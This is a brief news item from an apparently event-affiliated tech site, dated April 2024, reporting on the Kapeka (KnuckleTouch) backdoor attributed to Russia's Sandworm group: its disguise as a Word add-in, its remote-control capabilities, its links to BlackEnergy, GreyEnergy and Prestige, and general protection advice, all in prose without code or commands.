AI DevwWrld Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Kapeka: the new cyber threat from Russia

Discovering and analyzing a new global cybersecurity challenge

The Kapeka backdoor, identified by WithSecure, is a threat to Windows, linked to the Sandworm group. It disguises itself as a Word add-in and handles malicious operations remotely.

This pill is also available in Italian language

Recently discovered by the Finnish company WithSecure, the Kapeka backdoor, also known as KnuckleTouch by Microsoft, has a significant impact on Windows operating systems. This cyber threat, linked to the Russian-affiliated Sandworm APT group, operates mainly in Eastern Europe, with attacks recorded in Estonia and Ukraine since mid-2022. Kapeka is characterized by its versatility, being capable of acting both as an initial tool for cyber-attacks and as persistent remote access to victims' assets.

Technical details and use of Kapeka in cyber attacks

The Kapeka backdoor is implemented as a Windows DLL written in C++, featuring advanced command and control (C2) functionality. This malicious module disguises itself as an add-in for Microsoft Word to avoid detection, executing multi-threaded operations to effectively handle commands received from the C2 server. Its capabilities include reading and writing files, executing shell commands, and self-management through updates or autonomous uninstallation, thus increasing its stealth and efficiency in cyber espionage attacks or ransomware distribution.

Relationships between Kapeka and other malware families

WithSecure highlighted links between Kapeka and other well-known malware families such as GreyEnergy and BlackEnergy, indicating a possible evolution within Sandworm's strategy. Furthermore, a similarity in attack techniques was observed linking Kapeka to recent ransomware campaigns, such as that of Prestige. These associations suggest that Sandworm's arsenal is continually evolving, refining existing tools or developing new ones to increase the effectiveness of attacks.

Tips for protecting against the Kapeka threat

Microsoft has detected the use of "living-off-the-land" techniques, such as using the certutil utility to recover the dropper from compromised websites, emphasizing the importance of a proactive strategy in cybersecurity. It is essential to keep systems updated and conduct regular checks on codes and configurations. Promoting security awareness within organizations is crucial to mitigating the risk of infection from malware like Kapeka and protecting sensitive data and critical infrastructure.

Follow us on Twitter for more pills like this

04/23/2024 18:26

Editorial AI

Last pills

Global threat: serious security flaw discovered in the IEEE 802.11 Wi-Fi standardNew flaw in the IEEE 802.11 Wi-Fi standard exposes the security of global networks to serious risks

The fundamental aspects of computer security in everyday lifeProtection and prevention: how to safeguard personal data in the digital world

Black Basta hits Synlab: analysis of the attack and cybersecurity lessons for the healthcare sectorCyber defense strategies: how to protect healthcare infrastructures from ransomware

Google releases an emergency update for ChromeUrgent update to fix critical vulnerability in Chrome, users advised to install it immediately